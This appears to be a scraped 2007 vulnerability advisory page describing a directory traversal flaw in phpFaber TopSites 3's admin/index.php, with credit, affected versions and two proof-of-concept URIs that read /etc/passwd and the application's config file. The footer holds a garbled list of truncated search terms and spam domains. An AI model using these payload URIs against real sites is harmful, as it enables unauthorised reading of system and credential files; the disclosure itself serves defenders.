about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , PHPFaber TopSites Admin/Index.PHP Directory Traversal Vulnerability


Title PHPFaber TopSites Admin/Index.PHP Directory Traversal Vulnerability
Published 2007-04-11-12:00AM
Updated 2007-05-07-09:29PM
Class Input Validation Error
CVE  
Remote  Yes
Local  No
Credit  Dr.RoVeR is credited with the discovery of this vulnerability.
Vulnerable  phpFaber TopSites 3
Not Vulnerable  phpFaber TopSites 3.3
Code   Attackers can use a browser to exploit this issue.

The following proof-of-concept URIs are available:

http://www.example.com/Path/admin/index.php?page=template&modify=../../../../../../etc/passwd
http://www.example.com/Path/admin/index.php?page=template&modify=inc/config.ini.php
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 04:21:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
focking nascar zai2.com ajg.ajt.jt Windows Li erotic sto Gmhwhtg zishayy.co Www.metaca www.xxxpow fad Www.snffx nohe%3Bia Pepardas getcelldat www.lierm. Bartsimpso maxcpm.inf www.sexey. http:/vaca news for C news for c econitel blog.jshuw news for c acpi beijingsho news for c www.llxddc joomla/err r/n@ Fusion news for c 200 /compo www.uugor. 8158e.cn http://xue re-animate Www.89coms airuixing. trisha bot http:/vaca Www.Sexygi dgjsgs769. gioji fain www.jibing Www funmaz Www.metaca free hot s www.import